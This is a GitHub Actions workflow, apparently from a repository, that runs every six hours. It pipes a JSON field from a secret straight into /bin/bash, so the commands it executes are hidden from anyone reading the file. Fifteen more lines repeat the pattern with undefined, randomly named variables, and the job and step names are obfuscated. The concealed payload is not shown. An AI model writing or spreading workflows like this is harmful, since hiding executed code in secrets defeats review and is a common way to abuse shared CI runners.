name: droneitch
on:
  workflow_dispatch:
  schedule:
    - cron: '46 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: droneitch
        env:
          n1964: ${{ secrets.n1964 }}
        run: |
          echo $n1964 | jq -r .dbhda15760 | /bin/bash
          echo $mzvlh23 | jq -r .wugvq936 | /bin/bash
          echo $z30203 | jq -r .xazka4 | /bin/bash
          echo $xjb9276 | jq -r .h507 | /bin/bash
          echo $lap42 | jq -r .tjql77 | /bin/bash
          echo $u804 | jq -r .vbzq414 | /bin/bash
          echo $xj72559 | jq -r .bew20888 | /bin/bash
          echo $zaqj09070 | jq -r .xgiwd7 | /bin/bash
          echo $b5160 | jq -r .maiqw858 | /bin/bash
          echo $epf64770 | jq -r .abn85728 | /bin/bash
          echo $er7 | jq -r .guc23 | /bin/bash
          echo $xyh46 | jq -r .ysu29763 | /bin/bash
          echo $ekmum0676 | jq -r .jksn052 | /bin/bash
          echo $iw76 | jq -r .tdwe87213 | /bin/bash
          echo $ywt46 | jq -r .a49391 | /bin/bash
          echo $uwn97662 | jq -r .ipnr13 | /bin/bash

